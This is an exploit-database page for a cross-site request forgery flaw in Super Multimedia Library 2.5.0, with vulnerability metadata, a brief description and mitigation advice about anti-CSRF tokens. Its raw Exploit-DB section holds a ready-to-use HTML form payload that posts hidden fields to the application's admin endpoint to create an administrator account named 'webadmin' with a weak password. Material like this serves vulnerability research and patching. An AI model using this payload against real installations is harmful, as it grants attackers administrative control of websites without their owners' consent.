header-logo
Suggest Exploit
vendor:
Super Multimedia Library
by:
AtT4CKxT3rR0r1ST
8.8
CVSS
HIGH
Cross-Site Request Forgery (XSRF)
352
CWE
Product Name: Super Multimedia Library
Affected Version From: 2.5.2000
Affected Version To: 2.5.2000
Patch Exists: NO
Related CWE: N/A
CPE: a:allomani:super_multimedia_library:2.5.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Super Multimedia Library 2.5.0 XSRF Vulnerability (Add Admin)

A Cross-Site Request Forgery (XSRF) vulnerability exists in Super Multimedia Library 2.5.0, which allows an attacker to add an admin user to the system. An attacker can craft a malicious HTML form and submit it to the vulnerable application, which will add the specified user to the system without any authentication.

Mitigation:

The application should validate all requests and ensure that they are coming from a trusted source. Additionally, the application should use anti-CSRF tokens to prevent malicious requests.
Source

Exploit-DB raw data:

Super Multimedia Library 2.5.0 XSRF Vulnerability (Add Admin)
====================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://allomani.com/en/media_script.html
####################################################################

===[ Exploit ]===

<form method="POST" name="form0" action="http://localhost/Super Multimedia Library/admin/index.php">
<input type="hidden" name="action" value="adduserok"/>
<input type="hidden" name="hash" value="e10adc3949ba59abbe56e057f20f883e"/>
<input type="hidden" name="username" value="webadmin"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="email" value="Example@hotmail.com"/>
<input type="hidden" name="group_id" value="1"/>
<input type="hidden" name="useraddbutton" value="Add"/>
</form>

</body>
</html>
####################################################################




 		 	   		  
cqrsecured